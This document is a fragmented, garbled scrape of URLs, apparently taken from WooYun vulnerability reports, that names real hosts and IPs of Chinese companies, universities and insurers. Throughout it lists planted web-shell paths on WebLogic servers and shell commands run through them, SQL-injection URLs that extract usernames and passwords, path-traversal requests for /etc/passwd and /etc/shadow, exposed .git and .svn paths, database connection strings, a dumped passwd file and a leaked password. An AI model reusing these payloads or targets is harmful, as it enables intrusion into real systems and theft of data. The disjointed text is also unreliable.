http://**.**.**.**//showarticle.php?nid=206 http://www.chunbo.com:80/ http://**.**.**.**/mingyi.php?keshi=11 http://**.**.**.**/mingyi.php?keshi=&name=刘岩 http://**.**.**.**/js http://**.**.**.**/inc http://**.**.**.**/phpinfo.php http://bbs.coolhear.com/config/config_ucenter.php.bak http://home.coolhear.com/config/config_global.php.bak http://drops.wooyun.org/papers/7830 http://bbs.coolhear.com///forum.php?mod=ajax&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=checkusername&username=admin http://**.**.**.**/admin/UserRight.aspx http://**.**.**.**/admin/upload/20151223203124402/index1.ASPX http://svt.whut.edu.cn/show.asp?id=2197 http://182.48.117.37:9001/Console/Account/LogOn http://122.224.237.175:7002 http://122.224.237.175:7002/uddiexplorer/she11.jsp http://**.**.**.**:81/default.aspx http://**.**.**.**:81/default.aspx http://**.**.**.**:81/default.aspx jdbc:oracle:thin:@**.**.**.**:1521:claim root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin jdbc:oracle:thin:@**.**.**.**:1521:claim http://182.48.117.8/ http://182.48.117.8/uddiexplorer/sss.jsp http://182.48.117.8/uddiexplorer/out.jsp http://**.**.**.** http://114.251.203.84/ui/ http://114.251.203.84/ui/logon/LogonSubmit.jsp http://114.251.203.84/ui/logon/main.jsp http://mxptest.midea.com/ http://mxptest.midea.com/phpmyadmin/ http://mxptest.midea.com/info.php http://123.126.34.97:7001/ http://123.126.34.97:7001/uddiexplorer/mm.jsp https://crm.htsc.com.cn:8080/getmobileyzm.action http://113.108.133.169/ encap:Ethernet addr:10.122.14.41 Bcast:10.122.14.127 Mask:255.255.255.128 MTU:1500 packets:823831805 packets:598202772 txqueuelen:1000 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2010-0150867 http://**.**.**.**/ http://**.**.**.**//page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/weblogic/domain xmlns:sec="http://**.**.**.**/weblogic/security xmlns:wls="http://**.**.**.**/weblogic/security/wls xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xsi:schemaLocation="http://**.**.**.**/weblogic/security/xacml http://**.**.**.**/weblogic/security/xacml/1.0/xacml.xsd http://**.**.**.**/weblogic/security/providers/passwordvalidator http://**.**.**.**/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://**.**.**.**/weblogic/domain http://**.**.**.**/weblogic/1.0/domain.xsd http://**.**.**.**/weblogic/security http://**.**.**.**/weblogic/1.0/security.xsd http://**.**.**.**/weblogic/security/wls http://**.**.**.**/weblogic/security/wls/1.0/wls.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://**.**.**.**/weblogic/security/xacml xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://**.**.**.**/weblogic/security/xacml xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:credential-mapper sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name sec:password-validator xmlns:pas="http://**.**.**.**/weblogic/security/providers/passwordvalidator xsi:type="pas:system-password-validatorType sec:name sec:name pas:min-password-length pas:min-password-length pas:min-numeric-or-special-characters pas:min-numeric-or-special-characters sec:password-validator xsi:nil="true xsi:nil="true http://scm.fawjiefang.com.cn:81/,导致服务器getshell,并获取数据库连接,拿到大量文件盒数据。 http://211.156.194.185:9437 http://ba.amac.org.cn/login.action http://61.160.82.219:7001/ http://61.160.82.219:7001/uddiexplorer/ss.jsp http://yanbian.fang.com/ http://123.103.37.32 http://123.103.37.32/ http://202.108.253.41/ http://www.gujing.cn:7001/defaultroot/login.jsp http://www.gujing.cn:7001/defaultroot/she11.jsp jdbc:oracle:thin:@192.168.255.119:1521:oa http://**.**.**.**:7001 http://222.66.97.211/ http://222.66.97.211/uddiexplorer/111ss.jsp http://219.143.3.100/ http://219.143.3.100/uddiexplorer/ss.jsp http://222.168.65.184/ http://222.168.65.184/uddiexplorer/11ss.jsp http://222.168.65.184/uddiexplorer/out.jsp http://10.7.80.4 http://10.7.80.28 http://10.7.80.5 http://10.7.80.23 http://10.7.80.7 http://10.7.80.6 http://10.7.80.10 http://10.7.80.27 http://10.7.80.48 http://10.7.80.52 http://10.7.80.70 http://10.7.80.74 http://10.7.80.22 http://10.7.80.51 http://10.7.80.49 http://10.7.80.72 http://10.7.80.82 http://10.7.80.80 http://10.7.80.81 http://10.7.80.29 http://10.7.80.42 http://10.7.80.71 http://10.7.80.67 http://10.7.80.69 http://10.7.80.75 http://10.7.80.114 http://10.7.80.2 http://10.7.80.126 http://10.7.80.127 http://10.7.80.124 http://10.7.80.50 http://10.7.80.79 http://10.7.80.131 http://10.7.80.30 http://10.7.80.129 http://10.7.80.120 http://10.7.80.145 http://10.7.80.125 http://10.7.80.73 http://10.7.80.21 http://10.7.80.161 http://10.7.80.166 http://10.7.80.165 http://10.7.80.170 http://10.7.80.173 http://10.7.80.172 http://10.7.80.174 http://10.7.80.159 http://10.7.80.171 http://10.7.80.130 http://10.7.80.192 http://10.7.80.188 http://10.7.80.26 http://10.7.80.197 http://10.7.80.101 http://10.7.80.210 http://10.7.80.25 http://10.7.80.212 http://10.7.80.211 http://10.7.80.216 http://10.7.80.217 http://10.7.80.213 http://10.7.80.94 http://10.7.80.103 http://10.7.80.223 http://10.7.80.229 http://10.7.80.121 http://10.7.80.232 http://10.7.80.233 http://10.7.80.234 http://10.7.80.3 http://10.7.80.254 http://123.126.34.146:7081/uap/login!login.action http://123.126.34.117:7001/ http://123.126.34.117:7001/uddiexplorer/22ss.jsp http://123.126.34.117:7001/tian/ http://123.126.34.117:7001/Fiduys/ http://123.126.34.117:7001/uddiexplorer/reduh.jsp http://cxry.iy-cd.com:8081/RcLogin.action http://www.scrcoabj.com/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://www.scrcoabj.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://118.88.32.114:8081/ http://121.43.74.72:7005/tit-ydcd/ http://121.43.74.72:7005/uddiexplorer/she11.jsp?o=vLogin http://vip.xinhucaifu.com:7001/ http://**.**.**.**/villa_info.asp?id=427&type=55 http://114.251.203.84:8000/ http://114.251.203.84:8000/uddiexplorer/33ss.jsp http://114.251.203.84:8000/uddiexplorer/out.jsp http://**.**.**.**/ jdbc:weblogic:sqlserver://**.**.**.**:1433 https://github.com/lijie2015/nmhelper/blob/5faa6a65c25569ff26d512458197f528e33eb11d/src/main/resources/jdbc.properties jdbc:mysql://121.40.63.54:3308/nmbox?useUnicode=true&characterEncoding=utf8 www.xiaominet.com www.xiaominet.com:808/xmbbs/forum.php http://**.**.**.**/,图中标识链接存在漏洞 https://**.**.**.**/zhenghaofan/talentauction/blob/master/src/config/jdbc.properties http://**.**.**.** http://**.**.**.**/ http://www.17tx.com/zhengwu/news_board.php?id=22 http://member1.taobao.com/member/fresh/deliver_address.htm http://member1.taobao.com/member/fresh/deliver_address.htm yilos.com/svc/store/login yilos.com/admin xxx.com/sys http://222.73.173.5:7001/ http://114.251.203.84/ui//f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://114.251.203.84/ui//f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://scm.qdfaw.com/ http://**.**.**.**:8888/index.action https://**.**.**.**/gateway/hydzsw/DzswJYTS/action/KhjytsAction_initOutAdd http://**.**.**.**:90/存在“Java https://**.**.**.**/composer.do?token= http://vipsite.markfairwhale.com/ http://m.zbird.com/auth/password,找回密码页面,输入任意已注册的手机号,点击发送验证码。 http://**.**.**.**主站存在java反序列化weblogic应用 http://manage.chushi007.com/index/logout http://hk.shtvu.edu.cn/ http://hk.shtvu.edu.cn http://www.chunbo.com/.git/config coding:utf-8 www.sanhao.com/.git/config https://github.com/kost/dvcs-ripper都是好东西呢 http://114.251.203.90:9090/login.jsp com:81/.git http://42.159.227.124:81/.git http://**.**.**.** http://ucd.qbao.com/ http://jkb.shtvu.edu.cn/main/default.asp http://jkb.shtvu.edu.cn http://**.**.**.**/member/ http://**.**.**.** http://**.**.**.**/videomanage.asp?type=%E5%A4%A9%E6%B0%94%E9%A2%84%E6%8A%A5 http://oa.chinapork.com:8000/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%20md5%281122%29%20from%20user%20limit%201%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23 http://oa.chinapork.com:8000/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%20md5%281122%29%20from%20user%20limit%201%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23 http://oa.chinapork.com:8000/ http://**.**.**.**/finance/port/finance_port_in.jsp?port=G3 http://cconline.southernfund.com:9898 http://cconline.southernfund.com:9898/webcall_chat/leaveMessage.jsp http://58.20.114.244/ http://www.baiyimao.com/wgtz/Product/index!showProductDetailsFreshman.action?productId=8ae98fe04da3d912014da3e254d80001 http://114.255.207.162/ http://114.255.207.163/ http://**.**.**.**/phpMyAdmin/ http://**.**.**.**:8000/index.srm http://**.**.**.** http://**.**.**.**/admin/logined.php http://**.**.**.**/site_item_content_2.php?site_map_item_id=307 http://**.**.**.**/site_item_content_2.php?site_map_item_id=291 http://**.**.**.**//upload/fck_upload/1.txt http://update.ztgame.com/home_index.do http://**.**.**.**/newsView.aspx?id=1684 http://pt.ztgame.com http://pt.ztgame.com/.svn/ http://pt.ztgame.com/database/.svn/ http://pt.ztgame.com/database/update_user_detail.php http://**.**.**.**/index.php?g=Admin&m=Public http://portal.ehnchina.com/Clients/Pages/User/OrderDetail.aspx?orderId=46164 http://app.58.com/api/log/api/msgpush/add/bj/1 wicket:interface=:1 http://www.rufengda.com:80/ www.rufengda.com http://**.**.**.**/login.aspx http://58.56.60.68/ http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://114.251.203.84/ui/ http://114.251.203.84/ui/common/easyQueryVer3/EasyQueryXML.jsp http://114.251.203.84/ui/indexlis.jsp http://downloadpatch.ztgame.com.cn/web.zip http://www.wenji99.com/?m=product&s=list&brand=%E6%83%A0%E6%99%AEHP&brand_id=623 http://www.wenji99.com/?m=product&s=list&brand=%E6%83%A0%E6%99%AEHP&brand_id=623 http://www.caib.sgcc.com.cn/cms/web/jspdownload.jsp?FileUrl=/etc/shadow http://**.**.**.**/jgsz/dx/read.php?id=125 http://**.**.**.**:8090/ http://**.**.**.**/bugs/wooyun-2015-0152313(弱口令 http://202.108.103.169:9003/Allianture_frame http://101.227.9.117:8080/ http://101.227.9.117:8080/test.html http://rma.zte.com.cn http://210.51.195.23 http://wx.life.ehuatai.com/weixin/AcctServlet http://wx.life.ehuatai.com/weixin/AcctServlet?useropenid=人工马赛克&pubacctopenid=人工马赛克&operation=fwd http://**.**.**.**/hnmh/ http://43.250.14.93:8080/jenkins/ http://43.250.14.93:8080/jenkins/job/biz-passport-adapter-impl/ws/biz-passport-adapter-impl/src/main/java/com/youku/usercenter/biz/user/impl/UserAdapterServiceImpl.java https://113.108.182.3/aiap/other/download.dsr?file=/../../../../../../../../../etc/passwd www.95552.cc:8005 http://122.97.17.78 http://**.**.**.**/login.jsp http://**.**.**.**/ http://**.**.**.**:8001/login/ssoLogin_login2.action http://android.myapp.com/myapp/detail.htm?apkName=net.hoau http://hma.hoau.net:8080/hoauapp/rs/order/querybyuserid/628914 http://www.hoau.net/how/bse/queryByIdContacts.action?contactsIds=92940 http://shipping2.ems.com.cn/user/noActivate?id=XXX https://211.160.44.198/PowerInfoPub/infoPubPage/index.jsp)存在SSRF漏洞。 http://**.**.**.**/ocw/index.php?page=newsContent&id=334 http://www.dzyryd.com/index.jsp http://www.dzyryd.com/root.jsp jdbc:mysql://localhost:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://localhost:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://120.24.181.120:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://47.88.137.148:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://localhost:3306/sp2p?characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://**.**.**.**/16891/5ABBC04AAF2EC7C33915ADE4AAA9BA11.apk?fsname=com.xiangyu.mall_V2.3.2_70.apk http://api.feiniu.com/getpassword/sendmessage.do?receiveChannel=1&sendReceiver=18888888888&content=270335&receiveType=3&templateTemp=亲爱的用户您好,您的验证码为##content##&_=1451032868884 http://api.feiniu.com/getpassword/sendmessage.do?receiveChannel=1&sendReceiver=18888888888&content=226540&receiveType=3&templateTemp=尊敬的客户,您好.为答谢您长久以来对飞牛网的支持.飞牛网特送出价值500元的无门槛春节大红包一份.请点击http://www.wooyun.org&_=1451031865099 http://api.feiniu.com/static/js/modules/messageValidation.js http://chudan.ehuatai.com http://chudan.ehuatai.com:9000/zecmd/zecmd.jsp http://chudan.ehuatai.com:9000/myname/index.jsp http://chudan.ehuatai.com:9000/upload5warn/shell.jsp http://chudan.ehuatai.com:9000/upload5warn/JspSpyJDK5.jsp http://zhuanti.95081.com/install/index.php.bak http://zhuanti.95081.com/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://192.168.1.1/ http://zhuanti.95081.com//data/tang_6611.php http://**.**.**.**/tw/index.jsp http://**.**.**.**/Home/Login.aspx http://**.**.**.** http://mt.sogou.com/app/project/dashboard/project/24421/document/file/1457345 http://**.**.**.**/ http://**.**.**.**/attachment/AddDocsEntirdomainlogin.jsp?owner=1&ownerLevel=1&catalogID=110&showFlag=0&ownerID=31083 http://**.**.**.**/attachment/AddDocsEntirdomainlogin.jsp?owner=1&ownerLevel=1&catalogID=110&showFlag=0&ownerID=31083 http://**.**.**.** http://www.hishop.com.cn/products/ydfx/ https://github.com/jiayaoaaa/Scene-Editor-for-mobile/blob/66d5d699ea1d3648b84134531d6cab35d128ff50/library/class/Util/Email.php https://github.com/liuhaneventown/mice/blob/a0eef0f60961ac987abad40920a1bf22ce9a438b/application/models/sends.php http://60.10.8.85/.svn/entries http://60.10.8.130/.svn/entries http://60.10.8.85/finance/phpinfo.php http://60.10.8.176/memadmin/index.php http://wooyun.org/bugs/wooyun-2015-0143449 http://60.10.8.176/phpinfo.php http://**.**.**.**/ http://**.**.**.** http://cms.php.administrator.cctvmall.com/index.php http://**.**.**.**:9090/xianecho.php?htmlid=46211 http://**.**.**.**/cgi-bin/eduman1/system.fcgi?action=9999&U_fldComID=1 http://you.eventown.com.cn http://**.**.**.**/order/bukuan.php http://103.41.143.137:81/login.jsp http://www.art.zjut.edu.cn/workcount/login.asp http://qz6666.com/iframe.html http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc http://zhan.qq.com/default/tpl?screen=1&type=1 http://k.yiban.cn http://wb.west95582.com:8080/newback/ http://wb.west95582.com/wcc/service/ http://wb.west95582.com/wcc/service/index.jsp http://58.56.60.68:8088/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://wx.life.ehuatai.com/weixin/common/jssdkInit.jsp http://wx.life.ehuatai.com/weixin/FreeRisk/zx_first.jsp?token=GiveRiskReceivesinosoftgh_6f6a5558542esinosofto1ShXuJBC4GJqSeaKurlpUROKK3gsinosoft40010314sinosoft000000sinosoft000000sinosoft000000sinosoft00000000000001060178 http://www1.scuec.edu.cn/chcl/show.php?id=1 http://222.168.65.167:7001/uddiexplorer/she11.jsp?o=vLogin jdbc:oracle:thin:@10.6.193.13:1521:qmerpt http://211.155.92.68/images/1ndex.php http://180.76.153.81/ http://180.76.153.81:80/../../../../../../../../../../../../../etc/passwd http://180.76.153.81:80/../../../../../../../../../../../../../etc/shadow http://wx.life.ehuatai.com/weixin/FreeRisk/zx_Save.jsp http://wx.life.ehuatai.com/weixin/FreeRisk/zx_first_1.jsp?token=GiveRiskReceivesinosoftgh_6f6a5558542esinosofto1ShXuJBC4GJqSeaKurlpUROKK3gsinosoft40010314sinosoft000000sinosoft000000sinosoft000000sinosoft00000000000001060178 http://**.**.**.**:7001/defaultroot/sp/login.jsp http://www.medgrade.sdu.edu.cn/downloadfile.php?path= http://www.medgrade.sdu.edu.cn/downloadfile.php?path=config.php http://60.28.205.210/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 www.hnticai.com http://1.202.156.246:7001/ifpms-webservice/she11.jsp?o=vLogin http://**.**.**.**:7001/upbcsf/ http://**.**.**.**:7001/bea_wls_internal/she11.jsp?o=vLogin http://**.**.**.**/ http://**.**.**.**//messager/users.data http://**.**.**.**/index.php/Index/show/category_id/4/id/793 http://www.bee.zjut.edu.cn/shxq/admin/login.do http://www.et.zjut.edu.cn/admincp/ http://202.104.30.110:7001/wls-wsat/she11.jsp?o=vLogin http://1.85.2.249/对应card.yaic.com.cn http://1.85.2.249:7001/FCUR/she11.jsp?o=vLogin jdbc:oracle:thin:@10.0.70.90:1521:yazcxt http://**.**.**.**/msdx/app/?action=index&app=listmenu&controller=more&grade_id=1&human_new=new&page=1§ion_id=1&subject_id=all&type_id=all&version_id=all http://balance.cmge.com http://123.126.34.146:7001/ http://123.126.34.146:7001/uddiexplorer/11ss.jsp http://wooyun.org/bugs/wooyun-2015-0163572 http://g.corp.gome.com.cn/storefeedback/ http://**.**.**.**/存在weblogic反序列化 http://www.chinanetwork.com.cn/w8/SConfig/Get?key=ShowPartIntro&_=1450675365709 http://**.**.**.** http://**.**.**.** www.vsnoon.com http://corp.1disk.cn/showtu.aspx?filepath=1 http://222.168.65.186 http://222.168.65.186/uddiexplorer/11ss.jsp http://222.168.65.186/uddiexplorer/out.jsp http://10.7.64.12 http://10.7.64.21 http://10.7.64.35 http://wear.fh21.com.cn http://wx.life.ehuatai.com/weixin/Bonus/BonusPointQrySave.jsp http://wx.life.ehuatai.com/weixin/PolicyServlet?useropenid=o7maojgsY2GNLyHZGGK5bgAf_t7M&pubacctopenid=gh_54c766af31b4&operation=fwdptqry http://220.181.2.185 http://220.181.2.185:8000/../../../../../../../../../../../../../../../etc/passwd http://**.**.**.**/reading_certificate/bulletin_view.php?bulletin_view=249 http://survey.pptv.com/ http://**.**.**.** cn:8080/yyoa/checkWaitdo.jsp?userID=1 http://wx.life.ehuatai.com/weixin/VIPServiceServlet http://wx.life.ehuatai.com/weixin/vip/VipMainInput.jsp?useropenid=o7maojgsY2GNLyHZGGK5bgAf_t7M&pubacctopenid=gh_54c766af31b4 http://oa.gykgnmg.com/yyoa/ http://oa.gykgnmg.com/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 http://www.228.com.cn/integralHome/list--remen-2*-/1/ http://www.ailvxing.com//e/ShopSys/doaction.php?enews=DelAddress&addressid=1592 http://www.ailvxing.com//e/ShopSys/doaction.php?enews=DelAddress&addressid=1592 http://222.66.97.100:9001/ http://222.66.97.100:9001/uddiexplorer/44ss.jsp http://222.66.97.100:9001/uddiexplorer/out.jsp http://oa.sy-yy.com:8989/yyoa/ http://oa.sy-yy.com:8989/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=100 http://219.143.219.79/ http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=ls http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=pwd http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=cat%20config/config.xml http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=find%20/%20-name%20jfhl.jpg http://219.143.219.79/uddiexplorer/2ss.jsp?pwd=023&i=ls%20/bea/bea/user_projects/domains/saleweb_domain/web/UI/wwwroot/gw/ http://58.56.128.98:7003/ http://58.56.128.98:7003/uddiexplorer/33ss.jsp http://10.135.108.94 http://10.135.108.95 http://10.135.108.93 http://10.135.108.107 http://**.**.**.**/ http://**.**.**.**/userAttributesView.portal?userId=portal http://**.**.**.**/getBackPasswordByQuestion.portal https://**.**.**.**/ucenter/reg/checkPhone http://114.251.203.52:7001/ http://114.251.203.52:7001/uddiexplorer/55ss.jsp http://pl-lf.gicp.net:3535/picclife.asp http://pl-lf.gicp.net:3535/1111.asp http://wx.life.ehuatai.com/weixin/BindServlet?useropenid=o7maojgsY2GNLyHZGGK5bgAf_t7M&pubacctopenid=gh_54c766af31b4&operation=toBind jdbc:oracle:thin:@**.**.**.**:1521:testdb http://ids.wisedu.com:9081/ http://ids.wisedu.com:9081/userAttributesView.portal?userId=portal http://ids.wisedu.com:9081/getBackPasswordByQuestion.portal http://runforfun.vanke.com/web/DownFile.aspx?Path=/web.config http://e.tju.edu.cn/ http://dev.yaic.com.cn http://dev.yaic.com.cn/cfg/ http://**.**.**.** http://hk5.midea.com http://210.77.176.229/isc_sso/login http://210.77.176.229/uddiexplorer/22ss.jsp http://210.77.176.229/uddiexplorer/out.jsp coding:utf-8-*- http://www.ibidian.com/pay/pay/get_server_list http://mtip.tsingtao.com.cn/mblogin.jsp http://**.**.**.**/ http://**.**.**.**/admin/main.asp http://219.143.252.185:90 http://121.193.130.77/ http://www.hongzhoukan.com/alipay/pay_hb_index.php http://www.hongzhoukan.com/red_player.php?id=143&pid=l0142j9uhh2 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://**.**.**.**:8009/HomeDetails_Index.aspx?actionType=crule_item&actionID=89 http://221.6.6.81:7005 http://www.yiban.cn/ http://www.yiban.cn/member/list/group_id/****/puid/**** http://www.yiban.cn/Index/group/Index/group_id/****/puid/**** pass:pa55me http://114.80.198.206/dfjk/ http://114.80.198.206/uddiexplorer/22ss.jsp http://114.80.198.206/uddiexplorer/out.jsp http://114.80.198.206/uddiexplorer/out.jsp http://**.**.**.**/ http://**.**.**.**/js/2.jsp http://**.**.**.** https://mail.jd.com/Erpout/Logon.aspx http://oa.sy-yy.com:8989/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://oa.sy-yy.com:8989/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://oa.sy-yy.com:8989/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds= http://**.**.**.**的密码找回功能 http://**.**.**.**/bugs/wooyun-2015-0151853 http://**.**.**.**:9200/ http://**.**.**.**)提供技术支持的 http://**.**.**.**/wh/ http://**.**.**.**/wh/views/rewardQuery.jsp?flag=3&code=xxxx http://**.**.**.** http://121.193.130.231:8088/tuimian/ http://**.**.**.** http://**.**.**.**/ http://123.126.34.170:7001 http://123.126.34.170:7001/uddiexplorer/55ss.jsp http://**.**.**.**/brandWallDB.html?pr=0%2B0%2B0%2B8 url:http://wxsaletest.cfldcn.com:5000/ http://111.203.3.94 http://**.**.**.**/flight/FlightEvent2.asp?fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF&hbh=&submit=+%CC%E1%BD%BB+ http://**.**.**.**/flight/FlightEvent2.asp?fanwei=%B3%F6%B8%DB%BA%BD%B0%E0&dfz=%C8%AB%B2%BF&hbh=&submit=+%CC%E1%BD%BB+ http://www.xjair.com/article.aspx?id=201511201801521300 http://www.xjair.com/article.aspx?id=201511201801521300 http://www.xjair.com/article.aspx http://**.**.**.**/源码全部泄露 http://user.iyiyun.com http://211.144.92.121:8089/pgdoctor/ http://mycxjd.scuec.edu.cn/ index.php/Home/Article/index/id/100*/module_name/Manage http://mycxjd.scuec.edu.cn http://bot.aili.com jiashuangkuaizi.com/12345678 http://gitlab.corp.jiashuangkuaizi.com/ jiashuangkuaizi.com/jskz123456 http://mail.jiashuangkuaizi.com http://0r1.me/jskz_mail.txt http://0r1.me/jskz_mail_result.txt http://pm.oyekeji.com/ http://0r1.me/zentao.txt http://**.**.**.**/jctk/shiji/List.aspx?funid=293&deptid=408 http://www.csfujob.com/tslx/cnt/counter.asp?user=znl http://**.**.**.**/ http://1.85.2.252:7002 http://1.85.2.252:7002/uddiexplorer/55ss.jsp http://jpk.scuec.edu.cn http://jpk.scuec.edu.cn http://w.aili.com http://www.homeinns.com/member/register# http://**.**.**.**/ http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://**.**.**.**//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://**.**.**.**:7002/)存在Java反序列化漏洞,已经实现远程命令执行和Getshell。 http://**.**.**.**/cssroot.jsp http://**.**.**.**/memberInfoManagement/memberLogin.action http://**.**.**.**/经扫描发现开了3312端口,为Kangle虚拟主机管理系统,然后这个虚拟主机存在本地包含漏洞,利用过程如下: http://**.**.**.**:3312/vhost/index.php?c=../../../../../../../../../../../Program http://**.**.**.**/ http://**.**.**.**:8080/twy/login.action?username= http://www.scrcoabj.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.mtdd.ecnu.edu.cn/About.asp?ID=174 http://www.mtdd.ecnu.edu.cn/About.asp?ID=174%20%20union%20select%201,2,username,password,5,6%20from%20admin http://**.**.**.**/file_download.php?file_path=../config.php http://**.**.**.**/phpmyadmin/ http://vip.wissun.com/space/prohome/user_name/-1 http://202.108.103.193/ http://gpcr.ecnu.edu.cn/chakan.aspx?ContId=27 http://cjve.ecnu.edu.cn/center.aspx?id=5469b5f6-5982-4a2e-a1b3-2dd03603e225 http://beijing.zznissan.com.cn/admin/console/?c=login&a=log http://anhui.zznissan.com.cn/admin/console/?c=login&a=log http://chongqing.zznissan.com.cn/admin/console/?c=login&a=log http://civilian.zznissan.com.cn/admin/console/?c=login&a=log http://e.zznissan.com.cn/admin/console/?c=login&a=log http://fujian.zznissan.com.cn/admin/console/?c=login&a=log http://gansu.zznissan.com.cn/admin/console/?c=login&a=log http://guangdong.zznissan.com.cn/admin/console/?c=login&a=log http://guangxi.zznissan.com.cn/admin/console/?c=login&a=log http://guangzhou.zznissan.com.cn/admin/console/?c=login&a=log http://guizhou.zznissan.com.cn/admin/console/?c=login&a=log http://hainan.zznissan.com.cn/admin/console/?c=login&a=log http://hebei.zznissan.com.cn/admin/console/?c=login&a=log http://heilongjiang.zznissan.com.cn/admin/console/?c=login&a=log http://henan.zznissan.com.cn/admin/console/?c=login&a=log http://hubei.zznissan.com.cn/admin/console/?c=login&a=log http://hunan.zznissan.com.cn/admin/console/?c=login&a=log http://jiangsu.zznissan.com.cn/admin/console/?c=login&a=log http://jiangxi.zznissan.com.cn/admin/console/?c=login&a=log http://jilin.zznissan.com.cn/admin/console/?c=login&a=log http://liaoning.zznissan.com.cn/admin/console/?c=login&a=log http://neimenggu.zznissan.com.cn/admin/console/?c=login&a=log http://ningxia.zznissan.com.cn/admin/console/?c=login&a=log 